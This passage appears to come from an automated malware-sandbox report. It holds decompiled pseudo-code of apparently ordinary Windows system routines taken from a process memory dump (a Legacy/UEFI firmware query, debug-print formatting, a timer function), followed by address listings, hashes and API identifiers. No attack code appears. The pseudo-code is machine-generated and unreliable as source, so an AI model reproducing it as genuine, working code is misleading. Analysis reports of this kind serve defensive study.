					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E00C453CA(0);
						return E00C1D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E00C0F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E00BE3690(1, _t117, 0xba1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E00C0AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L00BE4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E00C0AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E00C4500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E00C09860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                                                                        0x00c451be
                                                                                        0x00c451c3
                                                                                        0x00c451c8
                                                                                        0x00c451cd
                                                                                        0x00c451d0
                                                                                        0x00c451d3
                                                                                        0x00c451d8
                                                                                        0x00c451db
                                                                                        0x00c451de
                                                                                        0x00c451e0
                                                                                        0x00c451e3
                                                                                        0x00c451e6
                                                                                        0x00c451e8
                                                                                        0x00c45342
                                                                                        0x00c45351
                                                                                        0x00c45356
                                                                                        0x00c4535a
                                                                                        0x00c45360
                                                                                        0x00c45363
                                                                                        0x00c45366
                                                                                        0x00c45369
                                                                                        0x00c45369
                                                                                        0x00c4536b
                                                                                        0x00c4536b
                                                                                        0x00c45370
                                                                                        0x00c453a3
                                                                                        0x00c453a4
                                                                                        0x00c453a6
                                                                                        0x00c453ab
                                                                                        0x00c453ab
                                                                                        0x00c453ae
                                                                                        0x00c453ae
                                                                                        0x00c453b5
                                                                                        0x00c453bf
                                                                                        0x00c453bf
                                                                                        0x00c45375
                                                                                        0x00c45396
                                                                                        0x00c453a0
                                                                                        0x00c453a0
                                                                                        0x00000000
                                                                                        0x00c45396
                                                                                        0x00c45377
                                                                                        0x00c45379
                                                                                        0x00c4537f
                                                                                        0x00c4538c
                                                                                        0x00c45390
                                                                                        0x00000000
                                                                                        0x00c45390
                                                                                        0x00c451ee
                                                                                        0x00c451f1
                                                                                        0x00c45301
                                                                                        0x00c45310
                                                                                        0x00c45315
                                                                                        0x00c45318
                                                                                        0x00c4531b
                                                                                        0x00c45320
                                                                                        0x00c4532e
                                                                                        0x00c45331
                                                                                        0x00000000
                                                                                        0x00c45331
                                                                                        0x00c45328
                                                                                        0x00c45329
                                                                                        0x00000000
                                                                                        0x00c45329
                                                                                        0x00c451fa
                                                                                        0x00c45235
                                                                                        0x00c45236
                                                                                        0x00c45239
                                                                                        0x00c4523f
                                                                                        0x00c45240
                                                                                        0x00c45241
                                                                                        0x00c45242
                                                                                        0x00c45246
                                                                                        0x00c45247
                                                                                        0x00c4524e
                                                                                        0x00c45251
                                                                                        0x00c45267
                                                                                        0x00c45269
                                                                                        0x00c4526e
                                                                                        0x00c4527d
                                                                                        0x00c4527e
                                                                                        0x00c45281
                                                                                        0x00c45282
                                                                                        0x00c45287
                                                                                        0x00c45288
                                                                                        0x00c4528a
                                                                                        0x00c4528f
                                                                                        0x00c45294
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c4529a
                                                                                        0x00c4529c
                                                                                        0x00c4529e
                                                                                        0x00c4529e
                                                                                        0x00c452a4
                                                                                        0x00c452b0
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c452ba
                                                                                        0x00c452bc
                                                                                        0x00c452bc
                                                                                        0x00c452d4
                                                                                        0x00c452d9
                                                                                        0x00c452dc
                                                                                        0x00c452e1
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c452e7
                                                                                        0x00c452f4
                                                                                        0x00000000
                                                                                        0x00c452f4
                                                                                        0x00c45270
                                                                                        0x00000000
                                                                                        0x00c45270
                                                                                        0x00c451fc
                                                                                        0x00c451fd
                                                                                        0x00c45202
                                                                                        0x00c45203
                                                                                        0x00c45205
                                                                                        0x00c4520a
                                                                                        0x00c4520f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c4521b
                                                                                        0x00c45226
                                                                                        0x00c4522b
                                                                                        0x00c4521d
                                                                                        0x00c4521d
                                                                                        0x00c45222
                                                                                        0x00c45222
                                                                                        0x00c4522d
                                                                                        0x00000000

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID: Legacy$UEFI
                                                                                        • API String ID: 2994545307-634100481
                                                                                        • Opcode ID: 97403e0fc730e4b1f5ab5f220afb6cb83847af996896b782b0a188baa4c67b64
                                                                                        • Instruction ID: aa162c4218a4ec64b6de752271918946c105f4eff597164a54b0e04f93cc725b
                                                                                        • Opcode Fuzzy Hash: 97403e0fc730e4b1f5ab5f220afb6cb83847af996896b782b0a188baa4c67b64
                                                                                        • Instruction Fuzzy Hash: 07517D71E00A199FDB24DFA9C840AADBBF8FB48740F14406EE519EB292D6719D41DB50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BCB171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 78%
                                                                                        			E00BCB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0xc9f7a8);
				E00C1D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E00C1D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E00C0D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E00C0F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L00C1DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E00C0B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E00C0B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E00C0E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E00C0A890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                                                                        0x00bcb171
                                                                                        0x00bcb171
                                                                                        0x00bcb171
                                                                                        0x00bcb171
                                                                                        0x00bcb171
                                                                                        0x00bcb176
                                                                                        0x00bcb17b
                                                                                        0x00bcb180
                                                                                        0x00bcb186
                                                                                        0x00bcb18f
                                                                                        0x00bcb198
                                                                                        0x00bcb1a4
                                                                                        0x00bcb1aa
                                                                                        0x00c24802
                                                                                        0x00c24802
                                                                                        0x00c24805
                                                                                        0x00c2480c
                                                                                        0x00c2480e
                                                                                        0x00bcb1d1
                                                                                        0x00bcb1d3
                                                                                        0x00bcb1de
                                                                                        0x00bcb1de
                                                                                        0x00c24817
                                                                                        0x00c2481e
                                                                                        0x00c24820
                                                                                        0x00c24822
                                                                                        0x00c24822
                                                                                        0x00c24824
                                                                                        0x00c24824
                                                                                        0x00c2482a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c24835
                                                                                        0x00c2483a
                                                                                        0x00c2483d
                                                                                        0x00c2483f
                                                                                        0x00c24842
                                                                                        0x00c24842
                                                                                        0x00c24842
                                                                                        0x00c24846
                                                                                        0x00c2484c
                                                                                        0x00c2484e
                                                                                        0x00c24851
                                                                                        0x00c24851
                                                                                        0x00c24853
                                                                                        0x00c24854
                                                                                        0x00c24854
                                                                                        0x00c24858
                                                                                        0x00c2485a
                                                                                        0x00c2485a
                                                                                        0x00c2485d
                                                                                        0x00c2485f
                                                                                        0x00c24861
                                                                                        0x00c24861
                                                                                        0x00c24866
                                                                                        0x00c2486b
                                                                                        0x00c2486e
                                                                                        0x00c24871
                                                                                        0x00c24876
                                                                                        0x00c24876
                                                                                        0x00c24878
                                                                                        0x00c2487b
                                                                                        0x00c24884
                                                                                        0x00c24884
                                                                                        0x00000000
                                                                                        0x00c2487d
                                                                                        0x00c2487d
                                                                                        0x00c24882
                                                                                        0x00c24889
                                                                                        0x00c24889
                                                                                        0x00c2488f
                                                                                        0x00c24891
                                                                                        0x00c248e0
                                                                                        0x00c248e2
                                                                                        0x00c248e4
                                                                                        0x00c248e4
                                                                                        0x00c248e7
                                                                                        0x00c248e7
                                                                                        0x00c248ed
                                                                                        0x00c248f4
                                                                                        0x00c248f6
                                                                                        0x00c24951
                                                                                        0x00c24951
                                                                                        0x00c24953
                                                                                        0x00c24953
                                                                                        0x00c24956
                                                                                        0x00c24956
                                                                                        0x00c24958
                                                                                        0x00c24959
                                                                                        0x00c24959
                                                                                        0x00c2495d
                                                                                        0x00c2495d
                                                                                        0x00c2495f
                                                                                        0x00c2495f
                                                                                        0x00c24965
                                                                                        0x00c24969
                                                                                        0x00c249ba
                                                                                        0x00c249ba
                                                                                        0x00c249c1
                                                                                        0x00c249c5
                                                                                        0x00c249cc
                                                                                        0x00c249d4
                                                                                        0x00c249d7
                                                                                        0x00c249da
                                                                                        0x00c249e4
                                                                                        0x00c249e5
                                                                                        0x00c249f3
                                                                                        0x00c24a02
                                                                                        0x00000000
                                                                                        0x00c24a02
                                                                                        0x00c24972
                                                                                        0x00c24974
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c24976
                                                                                        0x00c24979
                                                                                        0x00c24982
                                                                                        0x00c24983
                                                                                        0x00c24984
                                                                                        0x00c2498b
                                                                                        0x00c2498d
                                                                                        0x00c24991
                                                                                        0x00c24993
                                                                                        0x00c24999
                                                                                        0x00c2499d
                                                                                        0x00c249a2
                                                                                        0x00c249a2
                                                                                        0x00c249a2
                                                                                        0x00c24999
                                                                                        0x00c249ac
                                                                                        0x00000000
                                                                                        0x00c249b3
                                                                                        0x00c248f8
                                                                                        0x00c248fe
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c248fe
                                                                                        0x00c24895
                                                                                        0x00c2489c
                                                                                        0x00c248ad
                                                                                        0x00c248b2
                                                                                        0x00c248b5
                                                                                        0x00c248b7
                                                                                        0x00c248ba
                                                                                        0x00c248bc
                                                                                        0x00c248c6
                                                                                        0x00c248c6
                                                                                        0x00c248cb
                                                                                        0x00c248d1
                                                                                        0x00c248d4
                                                                                        0x00c248d8
                                                                                        0x00c248d8
                                                                                        0x00000000
                                                                                        0x00c248d8
                                                                                        0x00c248be
                                                                                        0x00c248c0
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c248c2
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c248c4
                                                                                        0x00000000
                                                                                        0x00c24882
                                                                                        0x00c2487b
                                                                                        0x00c24904
                                                                                        0x00c24906
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c24908
                                                                                        0x00c2490e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c24910
                                                                                        0x00c24917
                                                                                        0x00c24917
                                                                                        0x00000000
                                                                                        0x00c24917
                                                                                        0x00bcb1ba
                                                                                        0x00c247f9
                                                                                        0x00c247fc
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c247fc
                                                                                        0x00bcb1c0
                                                                                        0x00bcb1c0
                                                                                        0x00bcb1c3
                                                                                        0x00bcb1cb
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: _vswprintf_s
                                                                                        • String ID:
                                                                                        • API String ID: 677850445-0
                                                                                        • Opcode ID: 9c069be5b3c6b7e38b425e15bb2f1eb08aa721c0ff1d8455f4c219b5eb9a8ecc
                                                                                        • Instruction ID: 5ac00f1851e1f8ece771f5a79410f0e718e2d823cf90b5879f0629288086459f
                                                                                        • Opcode Fuzzy Hash: 9c069be5b3c6b7e38b425e15bb2f1eb08aa721c0ff1d8455f4c219b5eb9a8ecc
                                                                                        • Instruction Fuzzy Hash: EB51F171D102698BDB39DF64C845BAEBBB0AF00710F2041ADE869EB681C7704E81DB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BEB944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 76%
                                                                                        			E00BEB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0xcbd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E00BE7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E00C98CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E00C09E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E00C0B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E00C0CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E00BE7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E00C98F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E00C0AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0xcb8628; // 0x0
								_v68 = _t77;
								_t78 =  *0xcb862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0xcb8628; // 0x0
							_t116 =  *0xcb862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                                                                        0x00beb94c
                                                                                        0x00beb956
                                                                                        0x00beb95c
                                                                                        0x00beb95e
                                                                                        0x00beb964
                                                                                        0x00beb969
                                                                                        0x00beb96d
                                                                                        0x00beb96d
                                                                                        0x00beb970
                                                                                        0x00beb974
                                                                                        0x00beb97a
                                                                                        0x00bebadf
                                                                                        0x00bebadf
                                                                                        0x00bebae2
                                                                                        0x00bebae4
                                                                                        0x00bebae6
                                                                                        0x00bebaf0
                                                                                        0x00c32cb8
                                                                                        0x00bebaf6
                                                                                        0x00bebaf6
                                                                                        0x00bebaf6
                                                                                        0x00bebafd
                                                                                        0x00bebb1f
                                                                                        0x00bebb1f
                                                                                        0x00bebaff
                                                                                        0x00bebb00
                                                                                        0x00bebb00
                                                                                        0x00bebb03
                                                                                        0x00bebb03
                                                                                        0x00bebacb
                                                                                        0x00bebacf
                                                                                        0x00bebad0
                                                                                        0x00bebad1
                                                                                        0x00bebadc
                                                                                        0x00bebadc
                                                                                        0x00beb980
                                                                                        0x00beb980
                                                                                        0x00beb988
                                                                                        0x00beb98b
                                                                                        0x00beb98d
                                                                                        0x00beb990
                                                                                        0x00beb993
                                                                                        0x00beb999
                                                                                        0x00beb99b
                                                                                        0x00beb9a1
                                                                                        0x00beb9a5
                                                                                        0x00beb9aa
                                                                                        0x00beb9b0
                                                                                        0x00beb9bb
                                                                                        0x00beb9c0
                                                                                        0x00beb9c3
                                                                                        0x00beb9ca
                                                                                        0x00beb9cc
                                                                                        0x00beb9cf
                                                                                        0x00beb9d3
                                                                                        0x00beb9d7
                                                                                        0x00beba94
                                                                                        0x00beba94
                                                                                        0x00beba98
                                                                                        0x00bebaa3
                                                                                        0x00c32ccb
                                                                                        0x00bebaa9
                                                                                        0x00bebaa9
                                                                                        0x00bebaa9
                                                                                        0x00bebab1
                                                                                        0x00c32cd5
                                                                                        0x00c32cdd
                                                                                        0x00c32cdd
                                                                                        0x00bebabb
                                                                                        0x00bebabc
                                                                                        0x00bebac2
                                                                                        0x00bebac3
                                                                                        0x00bebac3
                                                                                        0x00bebac6
                                                                                        0x00000000
                                                                                        0x00beb9dd
                                                                                        0x00beb9dd
                                                                                        0x00beb9e7
                                                                                        0x00beb9e7
                                                                                        0x00beb9ec
                                                                                        0x00beb9ec
                                                                                        0x00beb9f1
                                                                                        0x00beb9f5
                                                                                        0x00beb9fa
                                                                                        0x00beba00
                                                                                        0x00beba0c
                                                                                        0x00beba10
                                                                                        0x00beba10
                                                                                        0x00beba12
                                                                                        0x00beba18
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00bebb26
                                                                                        0x00bebb26
                                                                                        0x00beba1e
                                                                                        0x00beba1e
                                                                                        0x00beba23
                                                                                        0x00beba25
                                                                                        0x00beba2c
                                                                                        0x00beba30
                                                                                        0x00beba35
                                                                                        0x00beba35
                                                                                        0x00beba41
                                                                                        0x00beba46
                                                                                        0x00beba4c
                                                                                        0x00beba50
                                                                                        0x00beba54
                                                                                        0x00beba6a
                                                                                        0x00beba6e
                                                                                        0x00beba70
                                                                                        0x00beba74
                                                                                        0x00beba78
                                                                                        0x00beba7a
                                                                                        0x00beba7c
                                                                                        0x00beba8e
                                                                                        0x00beba90
                                                                                        0x00beba92
                                                                                        0x00bebb14
                                                                                        0x00bebb14
                                                                                        0x00bebb16
                                                                                        0x00bebb16
                                                                                        0x00000000
                                                                                        0x00beba7c
                                                                                        0x00bebb0a
                                                                                        0x00bebb0d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00bebb0f

                                                                                        APIs
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BEB9A5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                        • String ID:
                                                                                        • API String ID: 885266447-0
